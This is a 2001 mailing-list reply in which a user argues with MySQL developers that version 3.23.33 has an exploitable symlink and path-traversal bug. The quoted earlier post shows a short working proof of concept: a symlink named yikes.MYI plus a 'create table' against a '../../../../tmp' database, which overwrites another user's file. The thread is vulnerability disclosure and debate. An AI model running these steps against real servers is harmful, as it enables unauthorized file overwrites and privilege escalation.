Hi.

All your arguments are irrelevant regarding my post: Sergei stated
that MySQL 3.23 would not be vulnerable to the posted exploit and I
proved it is (respecting the rules given in the exploit). I never
argued about the impact of the exploit.

To be true, I am worried about the answers we get. First, I wonder
about how Sergei was not able to repeat it, when I had no problem. A
test case showing that it did not work for him would have been nice
(sorry, Sergei, no harm intended).

Then you simply "talk away" the harm of this exploit, and ignore what
was said before. All your arguments may be valid, but have nothing to
do with the fact that there is an exploitable bug, regardless how many
impact it has.

In fact, until now, nobody from MySQL even officially acknowledged that
there is a problem, except implicitly by discussing it (on the
mysql-list I mean... there was an answer on bugtraq).

I wrote my last mail just because I already confirmed that problem
with 3.23 after I read bugtraq and therefore knew, that Sergei must
have tested in a different way than me.

But now I am upset about the fact, that obviously my post was not
taken seriously. :-(

My comments to your arguemnts follow below.

Bye,

        Benjamin.

On Wed, Mar 21, 2001 at 02:23:43PM +0200, [EMAIL PROTECTED] wrote:
[...]
>  > newton:~> mysql -u root -e "select version()"
>  > +-----------+
>  > | version() |
>  > +-----------+
>  > | 3.23.33   |
>  > +-----------+
>  > 8:26:25 newton:~> sudo -u mysql touch /tmp/test # just created a file owned by
>mysql-user
>  > 8:26:45 newton:~> ln -sf /tmp/test /tmp/yikes.MYI
>  > 8:26:54 newton:~> ls -l /tmp
>  > [...]
>  > -rw-r--r--    1 mysql    mysql           0 Mar 21 08:26 test
>  > lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
>  > 8:26:57 newton:~> mysql ../../../../tmp -e "create table yikes(w int(4))"
>  > 8:27:02 newton:~> ls -l /tmp
>  > [...]
>  > -rw-r--r--    1 mysql    mysql        1024 Mar 21 08:28 test
>  > -rw-rw----    1 mysql    mysql           0 Mar 21 08:28 yikes.MYD
>  > lrwxrwxrwx    1 philemon philemon        9 Mar 21 08:28 yikes.MYI -> /tmp/test
>  > -rw-rw----    1 mysql    mysql        8548 Mar 21 08:28 yikes.frm
>  >
>  > So, I have just overwritten a file not owned by me, namely /tmp/test.
>  > If mysql was running as root (which is of couse deprecated), I could
>  > overwrite any file in the system this way and even gain root access
>  > (as shown by someone on bugtraq), I think.
>  >
>  > Did I overlook something?
>  >
>  > So, it looks to me, that at least 3.23.33 is not secure in this way (I
>  > have not compared 3.23.34 resp. 3.23.35 because for both problems were
>  > reported preventing them from use in production systems).
>  >
>  > Even without MySQL running as root, I can do a lot of harm (with
>  > privilege to create tables, I can probably gain MySQL root privileges,
>  > delete any other table, delete configs and log files and so on).
>  >
> Running mysql as root is not safe.

I did not presume running mysql as root. See above: The files are
owned by user 'mysql'.

And I even explained which harm one can do with only getting
mysql-user rights.

> Next, you had full shell access, with which you can accomplish
> practically anything.

Huh? That's new to me. I agree, that someone in the know almost always
can find some way to gain root privileges if shell access is granted,
but it is far more difficult than the two-liner above, which each
script kiddie can use.

You don't really want to compare that, do you?

Btw, I don't need full shell access. I only need the possibility to
create a link, for example a buggy CGI-script with www privileges
which I can talk to executing ln -s /...

This way two "harmless" bugs become a serious one.

> Just take a look at passwd or shadow file, crack it and you can have
> what ever you want.

Well, the wit about shadow file is that it is *not* world readable.  I
always thought, that's what it's made for.

In other words: on a properly secured system, it's not impossible, but
a lot more difficult to do what you are talking about.

I cannot really believe that you meant that stuff as a serious
explanation that the bug shown above is not harmful.

> Last but not least, there is another matter. CREATE and FILE
> privileges also should not be granted lightly.

Of course, that why I was explicitly talking about the fact, that the
user needs CREATE privileges (FILE privileges are not needed, If I am
not mistaken).